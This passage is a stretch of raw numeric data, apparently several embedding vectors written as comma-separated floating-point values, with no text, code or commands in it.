,0.12697937,0.0050923494,-0.0011125865,-0.0076555824,-0.02070061,0.028551392,0.030321665,-0.014301593,0.0004127294,-0.009024692,0.019913737,0.011903246,-0.030579098,-0.023418404,0.00018881581,-0.0018421019,0.00601732,0.0069489107,0.012605747,-0.0040139845,-0.010387382,0.014399219,-0.05740559,-0.029367475,0.004566327,-0.0034001265,-0.0119046355,-0.00075546186,0.01259484,0.015802888,-0.017073179,-0.0043505593,0.004567725,0.0077472543,-0.022602428,0.013135809,0.014438294,-0.009148024,-0.0076475027,-0.033969652,0.016056348,-0.009737739,-0.015756525,-0.0049870797,0.005757462,0.024166888,0.015971204,-0.010043739,0.007461407,0.02612661,0.03470006,-0.0011863473,0.0048211077,-0.0031641792,-0.027848037,0.03194821,0.0050275736,-0.012655398,-0.017581796,0.013082435,0.0064986036,0.015520458,-0.008725973,0.01615128,0.009207028,-0.007638048,0.0028303708,-0.004317478,0.00695395,0.009135449,0.011692287,-0.015117583,-0.019062744,-0.0010086789,0.015320322,0.0066969725,0.010678848,0.020821786,0.00023274327,-0.014384754,0.00696117,-0.03980348,-0.002192202,-0.012670606,-0.013273408,0.010191435,0.012285061,-0.025809305,0.015394881,-0.034071196,-0.016771264,0.027764788,-0.0012059011,0.0030335598,0.0017991085,0.000025119389,0.004322681,0.011435339,0.03356519,-0.016704386,-0.011387823,-0.0038851348,0.01294708,-0.0123445755,-0.0024144275,0.0118912,0.010087188,-0.03868205,0.0115901455,-0.0013971087,-0.044758376,0.009188885,-0.02700074,0.02160355,-0.0036630058,-0.015968308,-0.015068576,0.024467278,-0.033237994,-0.014675491,-0.009891889,0.0124053,0.030830275],[0.012255775,0.010840984,-0.003292948,-0.0015658832,-0.0077778497,-0.014515437,-0.0017300682,0.026777918,-0.0033621807,0.0035529698,0.0018388581,0.0282157,0.00075800676,0.010025053,-0.013200598,-0.014149478,0.007254264,0.0006934956,-0.001974563,-0.008330374,-0.001988523,-0.00740172,-0.00079107436,0.012435347,0.023452159,0.024723826,-0.010248388,0.020367613,0.002486431,-0.00228602,0.02200516,0.018857244,0.01202016,-0.006218257,-0.0024250622,0.004486645,-0.016025936,0.0072685005,0.008323879,0.0006355707,-0.011155038,0.0022207163,-0.013323489,0.016679008,-0.00917382,-0.008217541,0.0000386536,-0.019675191,0.0036578465,0.013118661,0.012652221,0.0050134235,-0.017745292,-0.013022217,-0.013325961,0.015229303,-0.009819748,0.0025585366,-0.0009531489,0.0081055695,-0.013553066,0.030851258,-0.0056257867,-0.0064376527,0.0052425093,-0.006278339,-0.0022177482,-0.004813591,0.011053,-0.011934592,0.023380898,-0.024623526,-0.0029922698,0.0021130827,-0.00704401,0.007424268,-0.011323081,-0.00020004905,-0.030330906,-0.024917273,-0.010344468,0.003013978,0.013427028,-0.02816339,0.017556444,-0.022763155,-0.02248774,0.0050348523,-0.0000110052115,-0.0136696035,-0.027327811,-0.027243895,-0.002904503,0.0046331156,-0.012513638,0.017430646,0.01951572,-0.0036347553,0.009168868,-0.00024356939,-0.0075076297,0.0054360526,-0.014372242,0.011318702,0.008591009,-0.0000639413,-0.011520923,0.0001688533,-0.007863157,-0.008876694,-0.006706619,0.022400277,0.016464714,0.011305123,-0.0033869238,-0.0025090592,0.013292015,0.014812795,-0.008008343,-0.00860854,0.0019251871,-0.006507074,0.014113984,-0.0044205724,-0.0025248455,0.0014722659,0.011133286,-0.009033118,-0.00053244596,-0.013008146,-0.0032466578,-0.0016111033,-0.008245014,-0.00572378,0.0055883187,-0.0040127756,-0.010109011,0.009294512,0.00542456,-0.026391866,0.009261579,0.04103412,0.012459588,0.011578437,0.008352397,0.005260862,0.018727524,0.009985689,0.013144087,0.000053904492,0.0039992724,0.024346583,0.008212103,-0.0105598625,-0.006631911,0.00307927,-0.0053985077,-0.008429923,0.004697843,0.013092837,0.012854467,-0.00040866283,-0.0055491584,0.01864426,-0.016209789,0.017235473,-0.011670487,-0.0064948006,0.0032298963,0.009120741,-0.011501906,0.001779625,0.0015135808,0.0129196,0.00969794,0.0031404605,0.02606187,-0.033192534,-0.015410867,0.027109118,-0.010888165,0.007402331,0.003615284,-0.0039807647,0.00077431573,0.018788964,-0.008161322,0.0011971006,-0.007449605,0.026324395,-0.015287832,-0.013717241,-0.016435644,0.013478074,-0.021804512,0.0024950374,-0.0037986522,0.14228642,-0.013311646,-0.017614614,-0.0055700378,0.012686866,0.004516018,-0.008497335,-0.011732759,-0.022054495,-0.029780665,0.010725889,0.011254143,-0.0015925074,0.015688486,-0.014208491,0.016584763,-0.005119218,0.02866986,-0.085927755,0.006408469,0.007524907,-0.011990368,0.031959433,0.003043923,-0.0012680249,-0.01368848,0.0077375346,-0.00479342,-0.013035858,0.009263974,0.0051753786,-0.014740467,-0.018432405,0.004753374,0.017499294,-0.023355754,0.011274759,0.0062165563,-0.021749055,0.0008168957,0.015307118,0.01981562,0.003465082,0.0034359375,0.00035216592,0.015142717,0.006516182,-0.0054139863,0.007976101,0.028233387,0.0057442244,-0.0056281122,-0.038900655,0.009119671,0.0048443596,-0.0011151532,0.006283964,-0.012579455,-0.012848102,-0.011215382,0.013247732,-0.009653606,0.0034346168,0.0046293717,0.009727903,0.0013624484,0.013423425,0.014491043,-0.002360592,0.016699567,-0.0048777713,-0.017187985,0.0027602145,-0.028597716,0.00040288278,0.025542537,-0.017277906,0.011506752,0.006975943,0.0085085705,0.010127525,-0.0020874855,0.0014755796,-0.0042890366,0.009046947,-0.0012502528,-0.017672423,-0.0176287,-0.002629637,0.014399521,-0.004395407,0.030270524,0.01382026,-0.016415708,0.017445348,0.0009692293,0.007943085,-0.0016771719,-0.017587699,-0.007712562,0.009010547,0.003497344,-0.025424667,0.02974424,-0.0019759587,0.031092651,0.025185496,0.0035008434,0.0078345435,0.010417265,0.034442555,0.029951887,0.0022073903,-0.0033145929,-0.01267812,-0.014373016,0.0076096486,0.021556893,0.017341068,0.0000040802342,-0.0064713154,0.0085182395,0.005356792,0.009995315,0.0071257674,-0.0072190147,-0.009669693,-0.00989634,-0.020330934,0.026478939,-0.014602952,-0.004431296,0.0010870214,0.013233704,0.007298548,0.00808523,0.020368608,-0.032391552,0.018290697,-0.0013143792,-0.0000036192691,-0.012631318,0.020207267,-0.00068998314,-0.0017503917,0.0021992102,-0.0055899373,-0.012473701,-0.004526691,-0.0030646797,-0.008801119,0.010424443,-0.0076114796,-0.0057412586,-0.008608463,-0.018960524,-0.010039126,0.015807563,0.003685497,-0.007379124,0.00076241844,-0.00094332604,-0.01653129,0.011031275,0.013868045,0.0030506677,-0.015615445,0.06969267,0.010900514,0.0034539269,0.026746396,-0.0047973674,-0.032133028,0.020949008,-0.0019958068,-0.0067029926,-0.005115014,-0.00956005,-0.006772336,-0.0031407722,0.012666751,0.0035242094,0.009076258,-0.038583007,-0.002370981,-0.024350015,-0.0119126495,0.0064534564,0.0045023826,-0.03167866,0.031609207,-0.0023868585,0.0070974906,0.0011609163,-0.014379376,0.019521473,-0.011886715,-0.0007255553,-0.028805958,-0.010951662,-0.011608317,-0.0064010285,0.0003946128,0.0015669361,-0.010802039,-0.030990766,0.0060573504,0.00024370749,0.002952628,-0.016639635,0.0002476853,-0.016234098,0.020108592,0.008552694,-0.00496427,-0.0013899917,0.0059255776,0.016161634,-0.003002179,-0.017957505,0.029787416,-0.009767401,0.0037986632,0.008013135,-0.0030753396,0.00257302,0.003262734,0.028661173,0.009669106,-0.013557367,0.01477644,-0.020565212,0.034556687,-0.012783006,-0.005458204,-0.005677466,-0.017348511,0.010325611,0.017785186,0.005494136,-0.012250621,-0.0020912949,0.0028905359,-0.012079527,-0.008877654,-0.015109649,-0.011864421,-0.008200292,0.02201573,0.013106316,-0.0022349684,-0.016833177,-0.0052362382,0.00604779,0.013552077,0.010219303,-0.018056266,0.01692406,0.011180716,0.01662127,-0.008542868,0.01204611,-0.036162958,0.0040159593,-0.009874494,-0.016364738,0.019853942,-0.0134228,0.0059280354,0.0007729739,0.003980423,0.0034979756,0.009276023,0.0176148,-0.003836783,0.007418787,0.03432116,0.008995199,-0.012831173,-0.005006565,-0.0017258875,0.012145551,-0.009831496,0.000639483,-0.013668706,0.012448945,0.019462487,0.020631697,0.009716985,0.011878399,0.008061648,-0.015353259,0.0095460145,-0.010388428,0.018429793,0.017968565,0.019398188,0.013564271,0.008481518,-0.01638132,-0.04917748,0.0095860055,-0.00876686,0.02138607,-0.028520204,0.024478875,0.008064884,0.00006350831,0.0016396286,0.03413964,-0.0041082683,0.001962244,0.009469859,-0.0024466873,0.0012145718,-0.010650254,-0.025106996,0.0018790769,-0.0028886725,0.0032988717,-0.015165438,-0.02220041,0.014117483,0.026012313,-0.011044779,-0.016687782,0.006667464,0.025135687,-0.0026691072,0.019025998,-0.01250749,-0.0029933928,0.007791182,0.0076073976,0.07314746,-0.014611226,-0.029642416,0.002483801,0.012436671,-0.0010744582,-0.007520607,0.014813937,-0.02642745,0.02588245,-0.000833387,-0.005062831,0.01274099,-0.0025504797,-0.022229262,-0.017502192,0.00749058,-0.013187836,-0.011175011,0.0057777604,-0.0074631604,-0.006001487,-0.012703464,-0.023877015,-0.019327596,0.013576153,0.005730773,0.020592242,-0.0031579104,0.0038564622,-0.0056684557,-0.003605521,0.0012668951,-0.00673246,0.013616033,-0.0009800065,-0.0018693556,-0.0024317834,-0.017514864,0.016818894,0.016208947,-0.0020850808,0.001747485,0.010754844,0.007213269,-0.016080791,-0.009213585,0.01248909,0.006343929,-0.0074066953,-0.017850732,0.013535611,0.002293256,0.013171107,0.009252711,-0.009083829,0.0007098999,0.012475032,0.0038931004,0.0000647609,0.012863978,-0.00046733423,-0.01228116,-0.012111467,0.0049154544,0.02044919,0.009333306,0.010855843,0.0040669125,-0.015941907,0.015364453,0.003330355,0.010596976,-0.0074228114,0.014276373,0.011212288,0.0010507744,-0.0058973944,0.022318374,0.005316209,0.0066472786,0.01734729,-0.011498978,-0.0019269515,-0.0012819715,0.012269785,-0.002306141,0.012851092,-0.018204095,-0.035159763,0.020451983,-0.019338083,0.012292541,0.0007692036,-0.0043090885,0.0012348951,-0.0045618634,0.009478646,-0.0056980504,0.003502778,-0.015960721,-0.018624477,-0.021645894,0.012627038,-0.009621444,-0.0026401952,0.009037202,-0.0050676637,0.020470658,-0.01922809,-0.0028551414,-0.05273855,0.016637288,0.024250103,0.00406703,-0.018022604,0.03793699,-0.005288484,0.005616441,0.008755907,-0.0008872916,-0.009481381,0.0026986718,-0.025129117,0.015770102,0.03164196,-0.0031453152,-0.010576193,-0.033241693,-0.014598607,-0.07889875,0.013380918,0.026922652,0.009502829,0.008755218,0.009851345,0.015159294,0.0044283164,0.005901051,-0.0063752043,-0.008831433,0.005445325,0.0056189117,0.003355636,0.025030436,-0.03132567,0.0061225058,-0.001779093,0.01560298,-0.011140409,-0.010760873,-0.0038057356,-0.016485648,-0.024637135,-0.015150298,-0.01268734,0.008963238,-0.04099108,0.008297145,0.004216881,0.017868275,-0.011300904,0.0168237,0.005807715,-0.010294297,0.0038348688,0.0030954764,0.0059421486,0.033236384,-0.017798355,-0.005250301,0.010252603,0.0012720524,-0.006306578,-0.026239801,-0.0061843493,0.0055189827,0.0013417697,0.0032995734,0.009532098,0.018279951,-0.023994049,0.01715159,0.020402279,0.0077923294,0.006215057,0.008101463,0.012049589,0.01278258,0.005954101,-0.024722975,0.0061375406,-0.0074925646,-0.008485705,0.024781598,0.0059916037,-0.0040899124,-0.0045952476,-0.014930959,0.006440879,-0.00169072,-0.01595078,0.001287676,-0.011541364,0.0044583958,-0.0021697378,0.0018534497,-0.00033556315,-0.031895462,-0.018260838,0.016171942,0.0116089275,-0.011415431,0.002283691,-0.0014495092,-0.031459074,0.00096809136,-0.039288677,-0.011344923,-0.001499547,0.03176579,-0.009681621,0.01399925,0.001349076,-0.008019572,-0.000818498,0.025734818,-0.0056697307,-0.0048986543,-0.023337603,-0.015195959,0.010955239,0.023635695,-0.005776289,-0.028488137,-0.0060220477,0.010701955,-0.0040124757,-0.012632227,-0.0037768867,0.009828716,0.017485002,-0.0010740411,0.015809445,-0.0021163803,-0.013697219,-0.023526024,0.0036108354,-0.04374175,0.00087786524,0.009039143,0.01853441,-0.0018763725,0.00034387765,0.0017805044,0.021290524,0.016292237,-0.007942114,0.015640466,0.008499641,0.009676529,0.0239196,0.014854559,-0.026331661,-0.01752376,-0.027640564,0.012399511,-0.0063099638,0.026255455,-0.0027658518,-0.012691712,-0.013249575,0.003148418,0.004513179,-0.010580879,0.008784111,0.018717095,-0.021972442,0.021301262,0.002518991,0.022182984,-0.0051854085,-0.003664362,0.010318036,0.010689605,-0.005947811,-0.029575814,-0.04502775,-0.0012940877,-0.028902702,-0.0077407337,0.0028152303,-0.021237917,-0.016159097,0.013046683,-0.004844101,0.0051674033,0.02470359,-0.023552487,0.024759809,-0.007832454,0.0036945918,0.018678216,0.0039001908,-0.028324898,-0.002381346,0.008222535,-0.0048936093,0.025587644,-0.0039757057,-0.005596471,0.027922416,-0.004662167,-0.019618338,0.0074323597,0.02566385,-0.004623369,0.008220013,-0.012149961,-0.0013501229,-0.00027678782,0.010035384,-0.003596361,0.009106883,-0.00029267746,0.032782637,0.01724224,0.014817122,-0.014090723,-0.000731978,0.009273873,0.005943919,0.0024550476,0.0036478932,0.007902228,-0.007684388,-0.00326867,0.008542812,0.017117212,0.0046427213,0.008458792,-0.014642986,0.0141052455,-0.0024832182,-0.023581281,0.018598102,0.00014358961,0.00052988646,0.0062649213,-0.008037309,0.016118784,0.005883212,0.009792623,-0.008348823,-0.0006737636,-0.0031273775,0.008280073,0.007255154,0.009497323,-0.008435694,-0.031022646,0.02550942,-0.011177975,-0.014213845,0.008871428,-0.011753737,0.018781194,-0.05407833,0.0064507187,-0.013565197,-0.02513859,0.014918623,0.004109577,-0.019360948,0.001395581,0.004607621,0.001963078,0.009633667,-0.008355238,0.000026642942,0.013269955,-0.017234549,0.015709324,-0.0058845975,0.0037283888,-0.015691072,0.001590444,-0.0007530303,-0.02221392,0.0035961242,-0.011030316,0.00046403904,-0.002691936,0.02677539,-0.012713945,0.008250964,-0.0033248498,-0.010871722,0.028463915,-0.003130818,0.00046803476,-0.022619015,0.019039506,0.015162143,-0.0066191787,0.022456761,0.022421815,-0.07853521,0.019446312,-0.004708258,0.0059436345,-0.01621696,0.016052596,-0.0060301004,-0.011754119,0.032855257,-0.005089576,0.009437452,-0.013603121,-0.011968601,-0.012697466,-0.015964592,-0.00069234014,-0.01907603,-0.004246063,0.0014257563,0.004155256,-0.015729133,0.0060251653,-0.0019525306,-0.005466065,0.0045817895,-0.015049137,0.026665967,0.008187077,0.0027277654,0.01596475,0.022662973,-0.00034937996,0.019618642,-0.0022154532,0.008623941,-0.014568188,0.010053271,-0.007468316,-0.015680268,0.009027034,-0.0051854122,-0.015415142,0.0049013845,0.02379857,-0.014874384,0.0040132934,-0.002761487,0.0063894927,-0.012753659,-0.050350502,-0.0021071157,-0.019476332,-0.0006054337,0.013374067,-0.0030972075,0.0038508999,0.005900704,0.011563837,-0.02088336,0.019176485,0.0008334739,0.015501995,-0.0004462109,0.020401599,-0.031520817,-0.016079528,-0.006594216,-0.0028304975,0.0036904973,-0.009982504,-0.0059086867,-0.00057316327,0.0008556467,0.01342757,-0.0047494937,0.021774415,0.0021138513,-0.013681688,-0.0006341563,-0.0003847362,-0.0009343285,-0.010286049,0.00844235,0.0036856723,-0.038733564,-0.0034302797,0.003826857,0.007950004,0.0036755293,0.009802152,-0.003387206,0.005417235,-0.018854255,0.0108887125,-0.008047674,0.0075549046,0.00042274263,0.026267186,0.0010720524,-0.00023827079,0.011105119,-0.008216903,-0.016463472,0.016202658,-0.0050072647,0.00061719323,0.0038976131,-0.0079842415,0.01122828,0.01621896,-0.010048242,-0.00995365,0.01107988,-0.011674415,0.009700601,-0.0182409,-0.016769474,0.013124304,0.031436164,-0.0026577753,0.007456485,-0.008851156,-0.005543272,0.0056778817,-0.0066094357,0.004258661,0.016161025,-0.0036281631,0.008334235,0.0009849651,-0.019159134,-0.018843403,-0.022365196,0.007434716,0.03009005,-0.013213245,0.003277208,0.0077456175,-0.022597423,0.018296402,0.007578041,-0.0288294,-0.033939615,0.007946071,0.012844799,0.0019538864,0.0056918887,0.0009707672,-0.011246479,-0.021298723,0.004086294,0.012220774,-0.028266855,-0.029246561,-0.02887204,0.011945178,0.017832594,-0.003994645,-0.003653854,0.006374308,-0.014084577,-0.02652888,0.003004753,0.00037218776,-0.028556997,-0.0066265548,-0.013445041,0.011345273,-0.026113534,0.013270265,0.017789222,0.003950678,0.00052471546,0.007701893,0.0065709585,-0.0016350001,0.014662282,-0.0042169974,-0.011517573,-0.003573449,0.0075418847,0.02120581,-0.007328447,-0.0041991808,0.009549808,-0.019914458,0.010031054,-0.010886945,-0.03404701,-0.019284675,-0.014240762,0.010985076,-0.008311205,0.0023765475,-0.010825741,0.0032874914,-0.0074682944,0.013308991,0.008737575,0.016096154,-0.0138146635,0.022480048,0.008158624,-0.020239858,-0.026441993,0.016142352,0.03396861,-0.015494747,-0.009823545,0.010167474,-0.0018639449,0.007355475,-0.016341515,0.020340566,-0.0119798975,-0.026672754,-0.021324769,-0.018948669,0.00768135,-0.026981466,0.023028906,0.0072934576,-0.0219568,-0.0063563627,0.0013961811,-0.010434015,0.010792032,-0.004222456,-0.0035516832,-0.009951678,0.02570877,-0.009516423,0.022845455,0.009498215,-0.021790627,-0.0045415796,-0.019836634,0.0025374584,-0.009336717,-0.01959641,-0.0069551626,0.0019519528,-0.00529763,0.0022397195,0.027814124,0.026142647,-0.006492963,-0.00007003871,0.008945421,0.015485611,0.006718011,0.0043167365,0.005929254,-0.0014916784,-0.012583559,-0.0080680195,-0.008257418,-0.0005761559,-0.015583511,-0.0012098139,-0.014326052,-0.004647651,-0.0004084937,0.008258074,0.014044513,-0.013419279,0.023718841,-0.009903295,-0.008534553,-0.02327254,0.0016699226,-0.025888953,0.0055869585,0.0067732017,-0.008135676,-0.0052345744,-0.017565537,0.0038068506,0.007548156,0.008811165,0.018761333,0.015796915,0.021279752,-0.04490494,0.014216379,0.029516717,-0.0014628567,-0.03910971,0.0105066765,-0.020571182,0.0054210783,-0.008003383,0.0018280374,0.0093157375,0.017927501,-0.01090604,0.0024259305,-0.006109198,-0.020203415,-0.017284075,-0.0018938337,0.008890586,-0.004396756,0.005630951,-0.0018902391,0.012254888,0.00893363,0.01572942,0.00081171846,-0.0012579102,-0.018606322,-0.0067670564,-0.011383212,-0.022901544,0.004620531,0.023510506,-0.00057254033,-0.0034130886,-0.01295926,-0.005796461,0.01232204,-0.0035861158,-0.0022441372,0.0007332021,0.01195203,0.010994119,0.021286195,0.0129174115,-0.018612046,-0.00243972,-0.0087034935,-0.008572084,-0.007118382,0.018311026,-0.017905803,0.008241394,0.0045189173,-0.011202422,-0.0078014643,0.0023703028,0.0008545897,-0.032821823,0.08149205,-0.00042098828,-0.017933553,-0.025056858,-0.013115286,0.018246092,0.01716025,0.0162956,0.013295844,0.02445844,-0.005363053,0.0033107223,-0.002503592,0.004770806,-0.01314753,0.009292606,0.010860787,-0.0023362443,0.006526437,-0.0070399963,-0.02103445,0.0033693325,-0.014558657,-0.0064556804,0.014529381,-0.022034444,0.01288647,-0.004045227,-0.03243701,0.026766846,-0.02595413,0.00037818836,0.0008126406,0.014827669,0.022103706,-0.0026706143,0.0040620207,0.019755648,-0.010412177,-0.022501307,0.01007843,-0.00970817,0.0027654497,0.0020575002,-0.001230518,0.004732792,0.074502766,0.035155155,0.0107237715,-0.008903803,0.012794399,-0.0047399984,-0.010690959,0.01844354,0.0017511523,-0.015167524,0.0015370056,0.015947288,0.0021541663,0.0075626033,-0.0045771752,-0.022699948,0.0017249793,0.014538862,-0.0023657468,-0.016151229,0.019356182,0.0066068824,0.01590816,-0.005440233,-0.0024838813,0.0039591473,0.0037960173,0.019774666,0.027840592,-0.00016549282,-0.008883969,-0.0003128687,0.0063003274,0.026065068,-0.01061317,-0.090927884,0.006395682,0.248043,-0.0022510465,0.010974413,-0.014449806,-0.011408975,-0.006260629,-0.13780434,0.000096302356,-0.0043087914,-0.0031081329,-0.019369686,-0.0053507206,-0.0049190447,0.010547242,0.013157642,0.013204526,-0.009761966,-0.032291654,-0.009352747,-0.014744091,0.010241524,0.012673659,0.007461092,0.009969099,-0.021304188,0.001952746,0.011100624,-0.017347097,-0.029957322,0.016430946,0.0010094293,0.016998861,0.010291969,-0.006720338,-0.01501887,0.023339221,0.026822228,0.0085865315,0.0014880348,-0.006395566,-0.0007130711,-0.0066984156,-0.007471733,-0.016527671,-0.19712317,-0.011482957,0.020623596,-0.027795974,0.027135195,0.0023550475,0.017499391,0.0142636495,0.012279893,-0.01959773,0.004026404,-0.005682413,0.0121653825,-0.0056750937,-0.0032249568,-0.006157826,-0.012127401,0.016006457,0.032051153,-0.002871189,0.0050822888,0.012194268,0.0024868092,-0.02290571,0.031032903,-0.007677975,0.0037391288,0.025956932,-0.029713415,0.022996843,-0.022048572,-0.0027103876,-0.007876297,-0.00390843,-0.020881593,-0.015248899,-0.00092169206,0.015832575,-0.007416565,-0.013262105,-0.001201367,-0.021085624,-0.0012037816,-0.020080477,-0.00063116784,0.020574633,0.019104488,0.015842542,-0.0010327671,0.003587803,0.021998815,0.0061314777,-0.016486714,0.013545269,-0.019836465,-0.0029802874,-0.0073965834,-0.027027873,-0.010193889,0.008708704,-0.01283201,-0.026981285,-0.024146667,-0.012620944,0.030180793,-0.025573734,-0.0057186154,-0.024657182,-0.008047992,-0.0027020527,-0.014421124,-0.0075349417,0.0048089414,-0.00948538,0.019231765,0.013162803,-0.01717859,0.00363726,0.008719919,0.0061242,-0.020452026,-0.008114013,-0.023733614,-0.018172812,-0.007083926,0.004315511,-0.010753034,-0.015405944,-0.0035271596,0.0047799414,-0.0013923227,0.015026002,0.015585203,0.0022078105,-0.007864649,0.002798189,0.012215521,-0.011977438,-0.017369801,0.008950172,-0.0054388065,-0.0076245093,-0.023951482,-0.0020979773,-0.010602907,-0.011065163,-0.012760909,-0.012656936,-0.025121415,0.0022840002,-0.0030574244,0.0015019589,-0.0055538407,-0.027223365,-0.023016496,-0.023147678,0.027920427,0.00048745808,0.0052874167,-0.003793679,-0.032620337,-0.017497147,-0.008268302,-0.0035212545,0.033228002,-0.019840965,-0.025390817,-0.019873012,-0.017857831,-0.012091763,0.0063422737,0.0147462515,-0.0013718997,-0.0022795398,0.0012482271,-0.00165837,-0.01404006,-0.011077491,-0.01807867,-0.0104298005,-0.0062906723,-0.028714035,-0.0045261774,-0.023214905,0.007293692,-0.014976801,0.0057608974,0.0045768614,0.02245991,-0.010475926,0.014130852,0.023020642,-0.02539663,-0.002671055,-0.005490195,0.109150074,-0.014649713,-0.032564025,-0.007116973,-0.010073809,0.013421478,0.007627893,-0.00799777,-0.028421365,-0.0038692516,-0.0124532385,0.02847004,-0.008187017,0.015219755,-0.017320348,0.030162917,0.0015801743,0.02501989,-0.017238885,0.0010523299,0.00845113,-0.04404958,0.001660238,0.019190576,0.012036599,-0.007703331,0.013995502,-0.026056826,-0.016144404,0.0020419909,-0.022766614,-0.0034740297,0.0018372188,-0.009583271,-0.0009706922,-0.0015785869,-0.008765966,-0.011159094,0.0123828845,-0.006108665,0.0063235117,0.016514817,-0.005669523,-0.010366716,0.009470696,-0.0009477342,0.002852097,0.00706217,-0.0097306175,-0.0020239765,0.010700877,0.0148655195,0.0014291637,-0.02610014,-0.0061980914,-0.020531945,-0.0010530279,-0.0031866464,-0.011488577,-0.0022257806,0.039906677,-0.013178556,0.011151363,0.01070002,-0.0065758443,-0.008294809,-0.0018605056,0.009348638,0.012900426,0.028338214,-0.007791267,0.0033025364,0.0066950317,0.005212744,-0.011932095,-0.0033638861,0.0053941365,0.007902216,0.0019255094,0.01505757,-0.0051409374,0.007217319,0.0005235548,0.017978415,-0.042092115,-0.053658124,0.0012276388,0.008022411,-0.034966238,0.012162896,0.01037337,0.009169355,0.018421544,0.016322484,0.010915,-0.013789213,-0.012167601,0.006502882,0.0037301625,0.009411197,0.014994961,0.0020179295,-0.0154642295,0.0043995185,0.013228835,-0.0061292807,0.00009038138,-0.010735146,0.014019876,-0.00048969395,0.012708047,-0.0072850306,0.01245805,-0.01091747,0.009461301,0.05275932,-0.010741816,-0.012467833,0.0056587625,-0.0059520165,-0.014454095,-0.03206981,0.0010732155,-0.03245493,-0.0015520431,-0.0025582388,0.00059899857,0.0077903154,-0.010455793,0.030570265,-0.0005397434,0.024544628,-0.01231198,-0.0022549827,-0.004688509,-0.01279934,0.026674394,0.01736422,-0.0010478662,0.008185299,-0.009301056,-0.004537759,-0.0013885453,-0.022392442,-0.00077110535,0.0067837806,0.005336168,0.019436903,-0.011517508,0.0072315955,-0.0026013572,-0.029556146,0.0015539738,-0.008221602,-0.0012593595,0.008478469,-0.010319124,0.007741522,-0.0044873618,0.00208398,-0.0048903613,0.025095193,-0.015165735,-0.018854665,-0.020551533,0.015031975,0.021015093,-0.01621731,-0.0053604078,0.0028173546,-0.026905572,-0.018822778,-0.0003745777,0.013090658,0.0025638605,-0.0010327465,0.011906371,0.0058643026,-0.015420662,0.020780658,0.02153344,0.0320226,-0.017385753,-0.011553238,0.0006765234,-0.019783687,0.010891295,0.013281552,-0.01925787,-0.012669838,-0.0019458081,0.0088411635,0.005958454,-0.028393509,0.022221426,0.002310294,0.004667565,-0.02095966,-0.009951756,0.023871107,0.011824194,0.01979047,-0.0021127753,-0.0155355185,-0.0008852572,-0.008133387,-0.0044706864,-0.013650042,-0.009811938,0.011360078,-0.007972045,0.005029603,-0.017631415,-0.0215961,0.014225245,0.021432778,0.0040598037,0.016170673,-0.009535775,-0.022044038,0.0072072195,-0.00029357936,0.0014432282,0.02125566,-0.01984034,0.007344057,-0.0154163325,0.056444224,-0.022866951,0.0025764476,-0.004384313,0.04655584,0.021618426,0.006701254,0.01534603,-0.019370781,-0.001449621,-0.0060924375,-0.044240076,0.010071068,0.003990529,-0.012077265,-0.023357634,0.027117148,0.017468583,-0.001600297,0.009844305,-0.02287554,0.011678002,0.009216454,0.0030040669,-0.0060104937,-0.048123058,-0.0054608956,0.008974851,-0.0343561,-0.01719275,-0.0051064133,-0.012716928,-0.0030080108,-0.017473634,0.022118753,-0.008624634,0.011118659,-0.006744368,-0.0049808775,-0.0075681955,0.014564059,-0.00442722,-0.0028723627,-0.0064444668,0.003811952,0.0024322346,-0.0058629634,-0.0019144714,-0.0043055695,0.011917847,-0.0147329895,0.026615946,0.008001945,-0.020667274,0.015968213,0.008706892,-0.0013782781,0.020714907,0.008826759,0.01692374,-0.019297667,-0.0034206419,0.0051450054,-0.01836821,0.008315202,0.012928378,-0.012892829,-0.026706701,0.0036997802,0.012693535,-0.022199685,0.049613144,0.0037884035,-0.012505064,-0.010444287,-0.0043296325,0.016378047,-0.00091984053,0.0037476104,-0.008017336,-0.02704034,0.00480044,-0.0025735272,-0.011780951,-0.008302371,-0.007609907,-0.012364846,-0.00837692,0.015934428,-0.012648771,0.003819393,-0.0034013628,-0.0075998125,0.0027567323,0.014995583,0.015358976,0.003361204,0.005963471,-0.0008237486,-0.031982213,0.015721232,-0.014536366,0.0064753597,-0.006107513,0.0015611831,-0.0032662486,-0.14057834,-0.019834686,-0.022734985,-0.011896515,0.010657495,-0.007443271,0.014150283,0.06110381,-0.014600461,-0.027496852,0.0015133084,0.029547771,-0.020537945,0.010529224,0.010633856,0.01462313,-0.0076013873,-0.012819214,-0.012840134,0.009618859,0.012351095,0.018054403,0.018537704,0.011791941,0.0003500248,0.012348429,-0.0045476346,0.014166754,0.021931212,0.0040865457,-0.004663483,0.0027117373,0.0033439999,0.0009776438,-0.012669933,-0.0035638143,-0.011567756,0.0018248262,-0.004897739,0.013112156,-0.0059265615,-0.0041553136,0.007373963,0.022341643,-0.007600034,-0.012034145,0.01526304,0.0061848294,0.013599201,0.0034351675,0.008980902,-0.008700291,0.028985664,0.0085532395,0.0113228075,0.0018248074,-0.013192876,0.0148887215,-0.00013671193,-0.012512487,0.0053666765,0.008155801,0.006943065,-0.015100099,-0.010190716,-0.001447577,0.0040307245,0.006439116,-0.014694563,0.0045110197,-0.01216901,0.011873476,-0.00823557,-0.0015744867,-0.009536845,-0.010415226,0.0163315,0.025380574,0.026437588,0.014017354,-0.0154258935,0.0074174046,0.0012667147,0.014804801,-0.0076758196,0.0054460587,-0.0015074431,0.010491962,-0.0033943572,-0.009309309,-0.004404042,0.0015552597,-0.03244051,-0.00063485064,-0.0024045494,0.0005171684,-0.008091886,0.031854,-0.0008084747,-0.020101892,0.026909124,0.0071177282,-0.015211737,-0.015713265,-0.12729247,-0.0068432195,0.010336552,0.00422681,-0.036863506,0.014002329,-0.0017293863,-0.009808425,0.012048695,-0.008902796,-0.03570364,-0.0042100875,0.026929012,0.007549783,0.0018429796,-0.012310147,-0.030619446,0.025001768,-0.006993289,-0.005053493,0.019319693,-0.00065506436,-0.0013241798,0.0076039587,0.008108558,0.010220128,0.008714953,0.0059299846,0.009772468,-0.0046745017,-0.0065588136,0.0028177523,-0.012777309,-0.0006673424,-0.0068537267,-0.017336346,0.0063805943,-0.00028972872,0.004165178,-0.008841859,0.013381722,-0.0089510605,-0.009046229,0.004978436,-0.004228494,0.008202252,0.0020926148,0.0022447258,0.031613324,-0.0046617812,-0.010389411,-0.016650481,-0.013487301,-0.017640365,0.0077241296,-0.032839987,-0.01196255,-0.011319234,-0.0005294314,-0.011611495,-0.0147285005,0.025895618,-0.0046647415,-0.021558424,-0.013879393,0.008508455,-0.012976616,-0.0026643144,0.021067534,-0.008890945,-0.020622715,0.01373601,0.018109186,-0.013491241,0.03003345,0.030268185,-0.0054438463,0.017239405,0.029350622,-0.007562168,-0.007373838,-0.0134994835,